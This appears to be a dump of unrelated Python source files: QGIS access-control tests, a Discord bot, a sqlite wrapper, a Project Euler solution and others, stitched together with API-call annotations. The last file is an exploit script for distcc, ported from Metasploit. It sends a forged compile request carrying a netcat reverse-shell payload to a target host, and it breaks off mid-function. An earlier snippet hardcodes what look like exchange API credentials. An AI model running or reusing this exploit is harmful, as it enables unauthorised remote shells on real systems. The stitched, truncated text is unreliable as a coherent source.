anserini_cache_path = cached_path(PACKAGE_PATH['Anserini'], cache_dir=RELOGIC_CACHE)
if sys.platform == 'win32':
separator = ';'
else:
separator = ':'
jar = os.path.join(separator + anserini_cache_path)
if 'CLASSPATH' not in os.environ:
os.environ['CLASSPATH'] = jar
else:
os.environ['CLASSPATH'] += jar | [
"os.path.join",
"relogic.utils.file_utils.cached_path"
] | [((235, 297), 'relogic.utils.file_utils.cached_path', 'cached_path', (["PACKAGE_PATH['Anserini']"], {'cache_dir': 'RELOGIC_CACHE'}), "(PACKAGE_PATH['Anserini'], cache_dir=RELOGIC_CACHE)\n", (246, 297), False, 'from relogic.utils.file_utils import cached_path, RELOGIC_CACHE\n'), ((377, 422), 'os.path.join', 'os.path.join', (['(separator + anserini_cache_path)'], {}), '(separator + anserini_cache_path)\n', (389, 422), False, 'import os\n')] |
'''
MIT License
Copyright (c) 2019 <NAME>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
import sqlite3
class Database:
def __init__(self, name):
self.connection = sqlite3.connect(name)
self.cursor = self.connection.cursor()
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.commit()
self.connection.close()
def commit(self):
self.connection.commit()
def execute(self, sql, params=None):
self.cursor.execute(sql, params or ())
def fetchall(self):
return self.cursor.fetchall()
def fetfchone(self):
return self.cursor.fetchone()
def query(self, sql, params=None):
self.cursor.execute(sql, params or ())
return self.fetchall()
| [
"sqlite3.connect"
] | [((1160, 1181), 'sqlite3.connect', 'sqlite3.connect', (['name'], {}), '(name)\n', (1175, 1181), False, 'import sqlite3\n')] |
'''
Problem 28
11 October 2002
Starting with the number 1 and moving to the right in a clockwise direction a 5 by 5 spiral is formed as follows:
21 22 23 24 25
20 7 8 9 10
19 6 1 2 11
18 5 4 3 12
17 16 15 14 13
It can be verified that the sum of the numbers on the diagonals is 101.
What is the sum of the numbers on the diagonals in a 1001 by 1001 spiral formed in the same way?
----------------------------------------------------------
Created on 12.04.2012
@author: ahallmann
'''
import unittest
import timeit
def print_table(table):
s = ""
for row in table:
for column in row:
s += str(column) + " "
s += "\n"
print(s)
def spiral(size, clockwise=True):
table = [[0 for i in range(size)] for j in range(size)]
i = 1
x = (size/2)
y = (size/2)
if size % 2 == 0:
x -= 1
w = 1
direction = 0
table[y][x] = i
for m in range(1, size*size):
if m != 1 and m % 2 == 1:
w += 1
for step in range(1, w+1):
if direction == 0:
x += 1
if direction == 1:
if clockwise:
y += 1
else:
y -= 1
if direction == 2:
x -= 1
if direction == 3:
if clockwise:
y -= 1
else:
y += 1
# check if index out of bounds
if x < 0 or x >= size or y < 0 or y >= size:
return table
i += 1
table[y][x] = i
direction = (direction + 1) % 4
return table
def diagonals(table, size):
lst = []
# size = len(table)
for i in range(size):
lst.append(table[i][i])
if i != size / 2:
lst.append(table[i][size-i-1])
return lst
def count_diagonal(table, size):
return sum(diagonals(table, size))
def solve(size=1001):
table = spiral(size)
return count_diagonal(table, size)
class Test(unittest.TestCase):
def test_sample(self):
self.assertEquals(101, solve(5))
pass
def test_answer(self):
self.assertEquals(669171001, solve(1001))
pass
# -----------------------------------------
def run():
return solve()
if __name__ == '__main__':
unittest.main()
#if __name__ == '__main__':
# t = timeit.Timer("run()", "from __main__ import run")
# count = 100
# print(str(t.timeit(count)) + " seconds for " + str(count) + " runs")
| [
"unittest.main"
] | [((2490, 2505), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2503, 2505), False, 'import unittest\n')] |
# -*- coding: utf-8 -*-
"""QGIS Unit tests for QgsServer.
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
__author__ = '<NAME>'
__date__ = '28/08/2015'
__copyright__ = 'Copyright 2015, The QGIS Project'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '176c06ceefb5f555205e72b20c962740cc0ec183'
print('CTEST_FULL_OUTPUT')
from qgis.testing import unittest
import urllib.request
import urllib.parse
import urllib.error
from test_qgsserver_accesscontrol import TestQgsServerAccessControl, XML_NS
class TestQgsServerAccessControlWFS(TestQgsServerAccessControl):
def test_wfs_getcapabilities(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "GetCapabilities"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find("<Name>Hello</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertTrue(
str(response).find("<Name>Hello_OnOff</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertTrue(
str(response).find("<Name>Country</Name>") != -1,
"No Country layer in WFS/GetCapabilities\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find("<Name>Hello</Name>") != -1,
"No Hello layer in WFS/GetCapabilities\n%s" % response)
self.assertFalse(
str(response).find("<Name>Country</Name>") != -1,
"Unexpected Country layer in WFS/GetCapabilities\n%s" % response)
def test_wfs_describefeaturetype_hello(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "DescribeFeatureType",
"TYPENAME": "Hello"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find('name="Hello"') != -1,
"No Hello layer in DescribeFeatureType\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertTrue(
str(response).find('name="Hello"') != -1,
"No Hello layer in DescribeFeatureType\n%s" % response)
def test_wfs_describefeaturetype_country(self):
query_string = "&".join(["%s=%s" % i for i in list({
"MAP": urllib.parse.quote(self.projectPath),
"SERVICE": "WFS",
"VERSION": "1.0.0",
"REQUEST": "DescribeFeatureType",
"TYPENAME": "Country"
}.items())])
response, headers = self._get_fullaccess(query_string)
self.assertTrue(
str(response).find('name="Country"') != -1,
"No Country layer in DescribeFeatureType\n%s" % response)
response, headers = self._get_restricted(query_string)
self.assertFalse(
str(response).find('name="Country"') != -1,
"Unexpected Country layer in DescribeFeatureType\n%s" % response)
def test_wfs_getfeature_hello(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"No color in result of GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>red</qgs:color>") != -1, # spellok
"Unexpected color in result of GetFeature\n%s" % response)
self.assertFalse(
str(response).find("<qgs:color>NULL</qgs:color>") != -1, # spellok
"Unexpected color NULL in result of GetFeature\n%s" % response)
def test_wfs_getfeature_hello2(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>2</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_country(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_OnOff" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response) # spellok
# # Subset String # #
def test_wfs_getfeature_subsetstring(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>1</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>1</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
def test_wfs_getfeature_subsetstring2(self):
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>2</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>2</qgs:pk>") != -1,
"No good result in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Unexpected result in GetFeature\n%s" % response)
def test_wfs_getfeature_project_subsetstring(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for retrieving a feature which should be available in with/without access control
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>7</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be one result
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Feature with pkuid=7 not found in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>7</qgs:pk>") != -1,
"Feature with pkuid=7 not found in GetFeature, has been incorrectly filtered out by access controls\n%s" % response)
def test_wfs_getfeature_project_subsetstring2(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for a feature which should be filtered out by access controls
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>8</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be one result
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") != -1,
"No result in GetFeature\n%s" % response)
self.assertTrue(
str(response).find("<qgs:pk>8</qgs:pk>") != -1,
"Feature with pkuid=8 not found in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Feature with pkuid=8 was found in GetFeature, but should have been filtered out by access controls\n%s" % response)
def test_wfs_getfeature_project_subsetstring3(self):
"""Tests access control with a subset string already applied to a layer in a project
'Hello_Project_SubsetString' layer has a subsetString of "pkuid in (7,8)"
This test checks for a features which should be filtered out by project subsetStrings.
For example, pkuid 6 passes the access control checks, but should not be shown because of project layer subsetString
"""
data = """<?xml version="1.0" encoding="UTF-8"?>
<wfs:GetFeature {xml_ns}>
<wfs:Query typeName="Hello_Project_SubsetString" srsName="EPSG:3857" xmlns:feature="http://www.qgis.org/gml">
<ogc:Filter xmlns:ogc="http://www.opengis.net/ogc"><ogc:PropertyIsEqualTo>
<ogc:PropertyName>pkuid</ogc:PropertyName>
<ogc:Literal>6</ogc:Literal>
</ogc:PropertyIsEqualTo></ogc:Filter></wfs:Query></wfs:GetFeature>""".format(xml_ns=XML_NS)
# should be no results, since pkuid 1 should be filtered out by project subsetString
response, headers = self._post_fullaccess(data)
self.assertTrue(
str(response).find("<qgs:pk>") == -1,
"Project based layer subsetString not respected in GetFeature\n%s" % response)
response, headers = self._post_restricted(data)
self.assertFalse(
str(response).find("<qgs:pk>") != -1,
"Project based layer subsetString not respected in GetFeature with restricted access\n%s" % response)
if __name__ == "__main__":
unittest.main()
| [
"qgis.testing.unittest.main"
] | [((13834, 13849), 'qgis.testing.unittest.main', 'unittest.main', ([], {}), '()\n', (13847, 13849), False, 'from qgis.testing import unittest\n')] |
import asyncio
import os
import pathlib
import time
from datetime import datetime as dt
import discord
import lavalink
import pymongo as pym
from discord.ext.commands import *
from jishaku.help_command import *
import config
intents = discord.Intents.all()
print(intents)
class DataLogger:
def __init__(self, permafile):
self.permafile = permafile
self.tempdata = {}
self.mongo = pym.MongoClient()
self.db = self.mongo["BotLogger"]
self.col = self.db["logs"]
# self.tempdata=self.db["random"].find_one({})
print(self.tempdata)
def write(self, author, action, victim, reason, duration="Infinite", backup=None):
with open("num.txt") as f:
num = int(f.read())
with open("num.txt", "w") as f:
f.write(str(num + 1))
doc = {
"author": author.id,
"action": action,
"victim": victim.id,
"reason": reason,
"stamp": dt.now().strftime("%y/%m/%d:%I:%M:%S"),
"case": num + 1,
"duration": duration,
}
if not (backup == None):
doc["backup"] = backup
self.col.insert_one(doc)
def read_all(self):
a = []
for i in self.col.find():
a.append(i)
return a
def read_warns(self):
a = self.read_all()
b = []
for i in a:
if i["action"] == "WARN":
b.append(i)
return b
def read_case(self, num):
return self.col.find_one({"case": num})
def update(self):
pass
class RR:
def __init__(self, permafile):
self.permafile = permafile
with open(permafile) as f:
pass
class DarkBot(Bot):
def __init__(self, *args, prefix=None, **kwargs):
super().__init__(prefix, *args, **kwargs)
self.bad_words = [
"fuck",
"shit",
"ass",
"whore",
"bitch",
"dick",
"pussy",
"tit",
"shrey",
"tbag",
"retard",
]
self.bad_words = []
self.bg_task = self.loop.create_task(self.playingstatus())
self.mute_task = self.loop.create_task(self.mutecheck())
self.update_task = self.loop.create_task(self.updatelogger())
self.logger = DataLogger("logs.txt")
self.logger.tempdata["mutes"] = {}
self.games = ["with your life", "VALORANT as Yo Mamma"]
self.musicbackend = None
async def on_ready(self):
status = "Planet 666 | discord.gg/8GMA2M3 | 6!help"
self.invite = discord.utils.oauth_url(
self.user.id, discord.Permissions(permissions=8)
)
print(
"Logged in as",
client.user.name,
"\nId:",
client.user.id,
"\nOath:",
self.invite,
)
print("--------")
await self.change_presence(
activity=discord.Game(name=status), status=discord.Status.online
)
async def on_message(self, msg: discord.Message):
ctx = await self.get_context(msg)
if (
msg.author.id == 544699702558588930
and msg.content == "thou shalt be cast in flame"
):
exit()
for i in self.bad_words:
if i in "".join(msg.content.split()).lower() and ctx.author.bot == False:
await msg.delete()
await ctx.send("stop swearing")
if ctx.message.author.id in self.logger.tempdata["mutes"]:
await msg.delete()
with open("blist.txt") as f:
a = f.readlines()
if msg.content.startswith("6!"):
# await ctx.send("HA!")
print(a)
print(ctx.author.id)
if str(ctx.author.id) + "\n" in a:
await ctx.send("Blacklisted")
return
if msg.content.startswith("6!rr"):
return
try:
await self.process_commands(msg)
except Exception as ex:
print(ex)
async def logout(self):
if (musiccog := self.get_cog("Music")) is not None:
await musiccog.logout()
await super().logout()
async def on_command_error(self, ctx, error):
await ctx.send(error)
async def process_commands(self, message):
await super().process_commands(message)
async def playingstatus(self):
await self.wait_until_ready()
while self.is_ready():
status = "Planet 666 | discord.gg/8GMA2M3 | 6!help"
await self.change_presence(
activity=discord.Game(name=status), status=discord.Status.online
)
await asyncio.sleep(120)
async def mutecheck(self):
await self.wait_until_ready()
while self.is_ready():
for key in self.logger.tempdata["mutes"]:
value = self.logger.tempdata["mutes"][key]
print(key, value)
if value[0] <= time.time():
del self.logger.tempdata["mutes"][key]
await asyncio.sleep(10)
async def updatelogger(self):
await self.wait_until_ready()
while self.is_ready():
self.logger.update()
await asyncio.sleep(10)
@property
def connection(self):
return self._connection
if __name__ == "__main__":
client = DarkBot(
intents=intents,
prefix=when_mentioned_or("6!"),
help_command=commands.MinimalHelpCommand(),
)
nocogs = ["secret"]
for file in os.listdir("cogs"):
if file.endswith(".py") and not (file[:-3] in nocogs):
name = file[:-3]
try:
client.load_extension(f"cogs.{name}")
print(f"Loaded cog {name}")
except Exception as e:
print(f"Failed to load cog {name} due to error\n", e)
client.load_extension("jishaku")
try:
client.run(config.token)
except:
print("Bye!")
raise
# exit()
| [
"os.listdir",
"discord.Game",
"discord.Permissions",
"discord.Intents.all",
"datetime.datetime.now",
"asyncio.sleep",
"pymongo.MongoClient",
"time.time"
] | [((238, 259), 'discord.Intents.all', 'discord.Intents.all', ([], {}), '()\n', (257, 259), False, 'import discord\n'), ((5633, 5651), 'os.listdir', 'os.listdir', (['"""cogs"""'], {}), "('cogs')\n", (5643, 5651), False, 'import os\n'), ((413, 430), 'pymongo.MongoClient', 'pym.MongoClient', ([], {}), '()\n', (428, 430), True, 'import pymongo as pym\n'), ((2701, 2735), 'discord.Permissions', 'discord.Permissions', ([], {'permissions': '(8)'}), '(permissions=8)\n', (2720, 2735), False, 'import discord\n'), ((4767, 4785), 'asyncio.sleep', 'asyncio.sleep', (['(120)'], {}), '(120)\n', (4780, 4785), False, 'import asyncio\n'), ((5155, 5172), 'asyncio.sleep', 'asyncio.sleep', (['(10)'], {}), '(10)\n', (5168, 5172), False, 'import asyncio\n'), ((5328, 5345), 'asyncio.sleep', 'asyncio.sleep', (['(10)'], {}), '(10)\n', (5341, 5345), False, 'import asyncio\n'), ((984, 992), 'datetime.datetime.now', 'dt.now', ([], {}), '()\n', (990, 992), True, 'from datetime import datetime as dt\n'), ((3009, 3034), 'discord.Game', 'discord.Game', ([], {'name': 'status'}), '(name=status)\n', (3021, 3034), False, 'import discord\n'), ((5065, 5076), 'time.time', 'time.time', ([], {}), '()\n', (5074, 5076), False, 'import time\n'), ((4679, 4704), 'discord.Game', 'discord.Game', ([], {'name': 'status'}), '(name=status)\n', (4691, 4704), False, 'import discord\n')] |
from unittest.mock import Mock, patch
from core import ExactDelayPathfinder
import unittest
import networkx as nx
class TestEDPF(unittest.TestCase):
@patch('exactdelaypathfinder.core.ExactDelayPathfinder', autospec=True)
def test_search(self, mock_EDPF):
""" Tests the search function
Parameters:
mock_EDPF: Mock object reference of ExactDelayPathfinder
"""
new_mock_EDPF = mock_EDPF.return_value
new_mock_EDPF.search.return_value = 42
G = Mock()
new_mock_EDPF.search(G, 10, 'a', 'b')
new_mock_EDPF.search.assert_called()
@patch.object(ExactDelayPathfinder, '_search')
def test_search(self, mock_search):
""" Tests the _search function, the DFS algorithm (recursive method)
Parameters:
mock_EDPF: Mock object reference of ExactDelayPathfinder
"""
new_EDPF = ExactDelayPathfinder()
mock_search.return_value = []
G = Mock()
G.nodes = []
delay = 64;
start = 'a'
end = 'b'
new_EDPF.search(G, 64, 'a', 'b')
new_EDPF._search.assert_called()
def test_search_graph_Error(self):
""" Tests the search function attribute errors for the graph input parameter """
EDPF = ExactDelayPathfinder()
G = None
self.assertRaises(AttributeError, EDPF.search, G, 10,'a', 'b')
def test_search_delay_Error(self):
""" Tests the search function attribute errors for the delay input parameter """
EDPF = ExactDelayPathfinder()
G = Mock()
self.assertRaises(AttributeError, EDPF.search, G, -10,'a', 'b')
def test_search_max_result_Error(self):
""" Tests the search function attribute errors for the max result parameter """
EDPF = ExactDelayPathfinder()
G = Mock()
self.assertRaises(AttributeError, EDPF.search, G, -10,'a', 'b', -5)
| [
"unittest.mock.Mock",
"core.ExactDelayPathfinder",
"unittest.mock.patch",
"unittest.mock.patch.object"
] | [((156, 226), 'unittest.mock.patch', 'patch', (['"""exactdelaypathfinder.core.ExactDelayPathfinder"""'], {'autospec': '(True)'}), "('exactdelaypathfinder.core.ExactDelayPathfinder', autospec=True)\n", (161, 226), False, 'from unittest.mock import Mock, patch\n'), ((639, 684), 'unittest.mock.patch.object', 'patch.object', (['ExactDelayPathfinder', '"""_search"""'], {}), "(ExactDelayPathfinder, '_search')\n", (651, 684), False, 'from unittest.mock import Mock, patch\n'), ((527, 533), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (531, 533), False, 'from unittest.mock import Mock, patch\n'), ((939, 961), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (959, 961), False, 'from core import ExactDelayPathfinder\n'), ((1013, 1019), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (1017, 1019), False, 'from unittest.mock import Mock, patch\n'), ((1325, 1347), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (1345, 1347), False, 'from core import ExactDelayPathfinder\n'), ((1593, 1615), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (1613, 1615), False, 'from core import ExactDelayPathfinder\n'), ((1628, 1634), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (1632, 1634), False, 'from unittest.mock import Mock, patch\n'), ((1859, 1881), 'core.ExactDelayPathfinder', 'ExactDelayPathfinder', ([], {}), '()\n', (1879, 1881), False, 'from core import ExactDelayPathfinder\n'), ((1894, 1900), 'unittest.mock.Mock', 'Mock', ([], {}), '()\n', (1898, 1900), False, 'from unittest.mock import Mock, patch\n')] |
from __future__ import print_function
import re
import sys
def widthFind(val, widths):
for name in widths:
if widths[name] == val:
return name
print("Could not find a type: " + val)
sys.exit(-1)
def readNoComments(f):
file = ''
comment = False
for line in f:
if comment:
pos = line.find('*/')
if pos < 0:
continue
else:
line = line[pos+2:]
comment = False
pos = line.find('/*')
if pos >= 0:
line = line[0:pos]
comment = True
pos = line.find('//')
if pos >= 0:
line = line[0:pos]
line = line.strip()
if len(line):
file += line + " "
return file
def readModules(file, module_name, widths):
parts = file.split("module "+module_name+"_")[1:]
modules = {}
for module in parts:
end = module.find('endmodule')
if end < 0:
raise Exception('endmodule not found')
module = module[:end]
name = re.match('[A-Za-z0-9_]+',module).group(0)
print('Found a module: "'+name+'"')
posopen = module.find('(')
posclose = module.find(')',posopen)
minouts = []
statements = module[posclose+1:].split(';')
for inout in module[posopen+1:posclose].split(','):
inout = inout.strip()
p = inout.rsplit(' ', 1)
if len(p) == 1:
minouts.append(p[0])
else:
minouts.append(p[1])
statements.append(inout)
minputs = []
moutputs = []
for line in statements:
line = line.strip()
if line.startswith('input') or line.startswith('output'):
pos = line.find(' ')
line2 = line[pos+1:].strip()
pos = line2.rfind(' ')
if pos < 0:
typename = 'bit'
ioname = line2.strip()
else:
type = line2[:pos].strip()
ioname = line2[pos:].strip()
typename = widthFind(type, widths)
if ioname.startswith('__'):
continue
if line.startswith('input'):
minputs.append( (typename, ioname))
#print(' input',ioname)
else:
moutputs.append( (typename, ioname))
#print(' output',ioname)
if ioname not in minouts:
print("------------------------------------------")
print("Warning:", ioname, "is missing in I/O list.")
print("------------------------------------------")
modules[name] = {
'name':name,
'inputs':minputs,
'outputs':moutputs,
}
return modules
| [
"re.match",
"sys.exit"
] | [((191, 203), 'sys.exit', 'sys.exit', (['(-1)'], {}), '(-1)\n', (199, 203), False, 'import sys\n'), ((861, 894), 're.match', 're.match', (['"""[A-Za-z0-9_]+"""', 'module'], {}), "('[A-Za-z0-9_]+', module)\n", (869, 894), False, 'import re\n')] |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################
#
# This is open source software licensed under the Apache License 2.0
# http://www.apache.org/licenses/LICENSE-2.0
#
##############################################
"""Setup for plantgateway."""
from setuptools import setup
from plantgw import __version__
INSTALL_REQUIRES = ['bluepy==1.1.4', "paho-mqtt", 'pyyaml', "miflora==0.4"]
setup(
name='plantgateway',
version=__version__,
description='Bluetooth to mqtt gateway for Xiaomi Mi plant sensors',
author='<NAME>',
author_email='<EMAIL>',
url='https://www.python.org/sigs/distutils-sig/',
packages=['plantgw'],
install_requires=INSTALL_REQUIRES,
scripts=['plantgateway'],
)
| [
"setuptools.setup"
] | [((428, 737), 'setuptools.setup', 'setup', ([], {'name': '"""plantgateway"""', 'version': '__version__', 'description': '"""Bluetooth to mqtt gateway for Xiaomi Mi plant sensors"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://www.python.org/sigs/distutils-sig/"""', 'packages': "['plantgw']", 'install_requires': 'INSTALL_REQUIRES', 'scripts': "['plantgateway']"}), "(name='plantgateway', version=__version__, description=\n 'Bluetooth to mqtt gateway for Xiaomi Mi plant sensors', author=\n '<NAME>', author_email='<EMAIL>', url=\n 'https://www.python.org/sigs/distutils-sig/', packages=['plantgw'],\n install_requires=INSTALL_REQUIRES, scripts=['plantgateway'])\n", (433, 737), False, 'from setuptools import setup\n')] |
from huobi import HuobiRestClient
client = HuobiRestClient(access_key='<KEY>', secret_key='ff053cec-06dec3aa-3a15eecf-39e65')
trades = client.market_history_trade(symbol='ethusdt').data
trades
print(trades)
#help(HuobiRestClient)
kline = client.market_history_kline(symbol='btcusdt').data
kline = client.market_history_kline(symbol='btcusdt').data
kline = client.market_history_kline(symbol='btcusdt').data
print(kline)
#help(HuobiRestClient)
| [
"huobi.HuobiRestClient"
] | [((43, 130), 'huobi.HuobiRestClient', 'HuobiRestClient', ([], {'access_key': '"""<KEY>"""', 'secret_key': '"""ff053cec-06dec3aa-3a15eecf-39e65"""'}), "(access_key='<KEY>', secret_key=\n 'ff053cec-06dec3aa-3a15eecf-39e65')\n", (58, 130), False, 'from huobi import HuobiRestClient\n')] |
#!/usr/bin/python3
# Ported from Metasploit module - https://www.rapid7.com/db/modules/exploit/unix/misc/distcc_exec
import socket
from sys import argv
import random
import string
if len(argv) != 3:
print('Usage: ./distcc_exploit ip_addr port')
exit(1)
def exploit(ip, port):
# replace payload
payload = "nc 1.1.1.1 4444 -e /bin/bash"
try:
print('[*] Attempting exploit...')
distcc_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
distcc_socket.connect((ip, int(port)))
distcmd = generate_cmd("sh", "-c", payload)
# encode() to bytes
distcc_socket.send(distcmd.encode())
dtag = random_string_digits(10)
msg = ('DOTI0000000A' + dtag + '\n')
distcc_socket.send(msg.encode())
print("Check your reverse handler...")
response = distcc_socket.recv(1024).decode('utf-8')
print('[+] Response:\n', response)
except socket.error:
print('[!] Failed to exploit %s' % ip)
# generate fake request
def generate_cmd(*args):
cmd = list(args) + ['#', '-c', 'main.c', '-o', 'main.o']
# make it look like a compilation request
request = 'DIST00000001' + 'ARGC' + str(len(cmd)).zfill(8)
for c in cmd:
